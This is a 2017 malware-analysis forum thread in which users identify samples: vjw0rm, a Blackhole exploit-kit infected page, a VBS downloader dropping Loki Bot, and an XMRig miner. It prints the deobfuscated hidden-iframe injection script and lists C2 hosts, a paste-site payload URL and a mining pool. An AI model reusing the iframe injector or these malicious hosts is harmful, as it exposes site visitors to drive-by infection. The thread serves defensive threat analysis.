Malware collection

Forum for analysis and discussion about malware.
ikolor
Posts: 281
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Wed Jul 12, 2017 3:30 pm

this is not may file .Only from someone .

https://www.virustotal.com/en/file/342a ... /analysis/
You do not have the required permissions to view the files attached to this post.

Antelox
Posts: 176
Joined: Sun Mar 21, 2010 10:38 pm
Contact:

Re: Malware collection

Post by Antelox » Wed Jul 12, 2017 5:15 pm

ikolor wrote:this is not may file .Only from someone .

https://www.virustotal.com/en/file/342a ... /analysis/
vjw0rm

Code: Select all

hxxp://lipiec.ftpserver.biz:1742/Vre
BR,

Antelox

Antelox
Posts: 176
Joined: Sun Mar 21, 2010 10:38 pm
Contact:

Re: Malware collection

Post by Antelox » Wed Jul 12, 2017 5:43 pm

ikolor wrote:It is able to take more information from this file html.

https://www.virustotal.com/en/file/f9db ... 499847827/
This is an old infected page by Blackhole EK.

The malicious iframe, after deobfuscation, looks like

Code: Select all

if (document.getElementsByTagName('body')[0]){
    iframer();
} else {
    document.write("<iframe src='http://zihemmi.ru/count26.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
    var f = document.createElement('iframe');f.setAttribute('src','http://zihemmi.ru/count26.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
    document.getElementsByTagName('body')[0].appendChild(f);
}

Code: Select all

http://zihemmi.ru/count26.php
BR,

Antelox

ikolor
Posts: 281
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Thu Jul 13, 2017 11:50 am

Thanks you a lot for analyze this website .

https://www.virustotal.com/en/file/fd9e ... 499946518/
You do not have the required permissions to view the files attached to this post.

Antelox
Posts: 176
Joined: Sun Mar 21, 2010 10:38 pm
Contact:

Re: Malware collection

Post by Antelox » Thu Jul 13, 2017 12:11 pm

ikolor wrote:Thanks you a lot for analyze this website .

https://www.virustotal.com/en/file/fd9e ... 499946518/
Same shit as the one with SHA256: b9e2390f54ebfe328452d8b79d84b0d1869d27ade8c8819f519ad2100bfb46d5

BR,

Antelox

ikolor
Posts: 281
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Thu Jul 13, 2017 2:18 pm

You do not have the required permissions to view the files attached to this post.

Antelox
Posts: 176
Joined: Sun Mar 21, 2010 10:38 pm
Contact:

Re: Malware collection

Post by Antelox » Thu Jul 13, 2017 3:54 pm

ikolor wrote:ok a this .This is my hunt

https://www.virustotal.com/en/file/df65 ... 499955431/
This is a VBS downloader which downloads another VBS from: https://paste.ee/r/zE7Z8/0

The second VBS drops Loki Bot.

C2:

Code: Select all

hxxp://soundblast.club/sound/sound.php
BR,

Antelox

ikolor
Posts: 281
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Thu Jul 13, 2017 7:23 pm

You do not have the required permissions to view the files attached to this post.

User avatar
xors
Posts: 145
Joined: Mon May 23, 2016 2:01 am

Re: Malware collection

Post by xors » Thu Jul 13, 2017 8:55 pm

Probably a miner
@xorsthingsv2

Antelox
Posts: 176
Joined: Sun Mar 21, 2010 10:38 pm
Contact:

Re: Malware collection

Post by Antelox » Thu Jul 13, 2017 10:55 pm

Yep, it's XMRig miner.

ETPRO POLICY XMRig CoinMiner Usage

C2:

Code: Select all

xmr.pool.minergate.com:45560
Email:

Code: Select all

testfilatovmarafon@gmail.com
The Github page of the project: https://github.com/xmrig/xmrig

BR,

Antelox

Post Reply